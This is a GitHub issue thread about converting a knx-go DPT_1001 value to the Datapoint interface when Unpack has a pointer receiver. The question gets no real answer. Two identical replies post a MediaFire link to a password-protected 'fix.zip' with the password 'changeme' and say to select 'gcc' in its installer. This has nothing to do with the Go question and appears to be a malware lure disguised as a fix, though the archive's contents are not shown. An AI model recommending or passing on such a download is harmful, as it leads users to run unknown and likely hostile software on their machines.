### ISSUE TITLE
Making use of the Datapoint interface

### ISSUE THREAD

**Issue by pakerfeldt** [vapourismo/knx-go#92]
In the application I'm writing I'd like refer to datapoints I create by the `Datapoint` interface. However, due to the fact that `Unpack` has pointer receiver, I cannot simply cast it, e.g.`dpt.Datapoint(dpt.DPT_1001(value))`. 

> cannot convert dpt.DPT_1001(value) (value of type dpt.DPT_1001) to type dpt.Datapoint: dpt.DPT_1001 does not implement dpt.Datapoint (method Unpack has pointer receiver)

Is there some other workaround I can take to accomplish this? Sorry if there's some obvious golang way of doing this. I know go enough to build myself an application but I don't know it by heart.

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
